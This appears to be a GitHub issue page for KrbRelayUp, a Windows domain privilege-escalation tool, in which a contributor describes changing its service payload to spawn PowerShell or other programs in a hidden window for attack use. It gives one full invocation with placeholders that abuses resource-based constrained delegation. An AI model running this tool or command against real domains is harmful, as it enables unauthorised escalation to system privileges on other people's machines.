Dec0ne / KrbRelayUp

KrbRelayUp - a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).

Customize krbSCM payloads with hidden window #28

Open SnowWhite1129 opened 2 years ago

SnowWhite1129 commented 2 years ago

The original version of KrbRelayUp could only spawn cmd.exe with a new window. I modified the spawn process to make it more practical in attack scenarios.

Now, it can spawn PowerShell or other executable files in the bin path like this:

```
./KrbRelayUp.exe spawn -m rbcd -d <domain> -dc <server_name> -cn <computer_name> -cp <computer_password> -sc "powershell.exe tasklist > C:\Windows\Temp\tasklist.txt"
```